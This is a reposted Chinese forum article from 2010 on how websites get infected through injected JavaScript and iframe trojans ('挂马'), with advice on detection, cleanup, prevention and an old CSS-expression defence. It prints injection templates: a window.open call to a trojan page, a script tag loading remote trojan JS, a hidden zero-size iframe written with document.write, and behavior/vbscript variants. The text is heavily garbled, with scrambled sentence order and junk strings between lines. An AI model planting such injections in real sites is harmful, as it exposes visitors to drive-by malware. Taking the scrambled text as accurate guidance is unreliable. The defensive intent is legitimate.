搜索
查看: 7210|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

# W' @7 q5 H7 }8 l$ u$ Z2 t

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

" m% |3 l. \0 L

IFRAME 和 JS 脚本挂马。

8 K: P9 g* g* u4 L g3 F( p5 \

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

, ~& b% t, r3 Q O( r: P5 r5 j- e

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

' ^! T* Q6 C0 P0 r# v& N$ [

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

0 ~& b% `" b* T5 ]

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

1 U' o# z3 h8 S2 y' h3 W, c$ ]/ f

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

# l; n) Y9 U/ s

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

; q/ k9 x! s/ Q( }, S) L2 z% d

。一千多位会员的 ID

/ h0 X: Q# B1 a' G) o* N; Y- @

2: 如何检测网页是否被挂马。

, u- J. v7 j/ X! s/ l# a# E

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

2 d1 U: w2 @1 I* k* {1 E

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

& c2 k/ g, m" ]) d9 Y7 E* v

因素。
2 googl 检测。>

$ C3 j( G# p) H

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

3 R: O. m- i6 H2 H0 O& F

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

) p; S. B- n/ L p1 a: x+ b

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

- G; q+ s7 _3 H- R g

- B, D( F! N1 B- k( o

3: 如何清除网页木马。

K% X+ [' x2 z3 {

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

, O! e3 W3 s" s

入源文件把相关的网页挂马种类的可疑代码删除。

7 E8 U* W7 q% z, u5 _9 {% d# B

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

2 o# _# ]0 P8 R# f+ a' w( |/ m

悉。>

! M8 ?2 {" A/ S% M8 d

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

: ^$ W, {& e" m u" x

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

/ P V7 n4 {0 }/ S

2 保证你所使用的顺序及时的更新。

" N* S9 b) C& h7 b% h1 k

3 不要在前台网页上加注后台管理程序登陆页面的链接。

8 o/ j* u0 s/ v U

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

% R# \( i; l6 H; K: x; t- L1 F

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

, ?% F! H9 D4 W6 @# E. O1 [

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

5 N: I1 m" ~* p: E" l! c1 }, }

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

/ t- U' R3 ^& `& ?" l) _: k

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

; N; T V8 U2 f( q- p# v! O( m

- C* S# G4 s% E6 |4 I

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

. i2 R3 T* J% A2 y3 a" j2 T

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

; K( t- B8 |4 H

JS 挂马溯源

' K2 s4 H% P! e3 u

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

. L; I3 g; g; n7 C: `) U3 d

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

( C0 Z, ~6 K/ r' _8 ]5 T3 R, G

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

4 C/ E% \8 V4 V7 K

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

( w" O! ^1 N! h

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

( s- Z; }/ e) B9 z' ]

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

; `/ `, j" F( d, {) K: d

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

% y z5 r3 j1 V# Q. `

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

9 b* d/ v: l) W' A

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

7 M3 d! J6 D2 J7 u, P, `; W/ k! }

脚本在工作中会有很大的协助。

* o, [6 K) v* w% y6 v# a/ b

挂马原理一点通

' e/ X! f2 \! H+ r

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

8 k: y7 q* j3 j

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

+ C L2 t, r: U, ~( x% c! v

无从区分木马在何处。

+ U6 f, o1 E Y# o- A' |) y

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

; ?% B5 W4 L* d: ^; d8 L6 r3 N$ r

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

- b" |2 b% C3 C7 \ ~5 |3 @% I

容易蒙混过关,导致木马久杀不绝。

' ]' R0 o7 S( y

JS 挂马攻防实录

W2 M8 ?* [1 z7 E6 |

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

/ K6 J2 ?4 i8 n) U+ _4 p

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

* ? i5 q7 G# @2 P7 E- V+ t

这种方法使用的关键代码如下:

, u3 P0 S8 {! _( j1 _

"",  window.open "http://www.v404.cn/ 木马

( e6 L$ w/ D2 b

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

3 x( h4 E* Q2 X0 T

4 T4 Y. c% B# |1 g/ F

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

5 l' F8 w# T; R/ D6 D) Q

但是设置为 0 后,可能会出现恶意代码不运行的情况。

( v$ x& }. Y0 @7 g, H* k; A) c

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

0 `, @: q3 j' J) y

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

3 D6 g ?- z+ w0 ^. {) o8 M

% b* x$ j7 l7 |. W& K- W2 z

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

& s# L% ?2 ]3 J* x: [1 _

' i( i! T5 s, {/ k2 _6 d* f5 S

或者

- r. n% F5 `4 c/ N; g

document.writ "<div style='display:none'>"

+ M3 `* ~" @" @1 g, Y5 n; h

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

7 u, m3 D% j a3 N7 t

document.writ "</div>"
 

; |4 l' `$ E4 ^8 W0 ]8 b

- X& a! k8 c" Y4 p: E

就成功地将木马挂到对方的网页中了

" r. T- b* f: V1 K( y

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

# N* E) B7 n; f) [

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

, H" j1 j' P/ W5 j; w. A

或者:

2 j5 y/ V) f. V3 G2 W( `

<ifram src="vbscript:[ 挂马脚本 ]">

) i/ E' a. E7 s- U" i% j' W' b

! c& _8 D9 o# N& z+ |# |


等等 …

# u- P. X7 ^4 m% }

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

3 ^8 u% c# u8 E

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

: Q! Y, S! t5 N& p1 h. ^

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

3 @$ T5 Y) Y4 a3 A8 p

;}

8 v2 y1 c; @) _# g

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

* E( T5 M4 H; J1 D

7 k' z$ r: Z& H1 H" p% D' {

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

& d" p2 y" i9 i* v" N

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

- o9 h3 g: u0 \. |- Q

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

. [( k7 X+ J1 L6 L

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

3 x& a1 r2 a, s3 d$ Z6 K

<title> 让 JS 挂马中止的 CSS 代码 </title>

& {/ z) ]. q- L" V1 ?) e' P

<styl type="text/css" id="shudoo">

; L0 v1 Z: H c1 c0 e- A: S1 G, K8 A

/*<![CDATA[*/

3 Y$ g& _& c: i! k0 J/ c' A

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

$ g8 Z) J. T" f$ I7 |; r1 r: I' R

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

' ]% c- W1 c% i* T8 ~

/*]]>*/

& F; B4 K$ n- _7 [

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 ( 鲁ICP备13006813号-1 ) 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表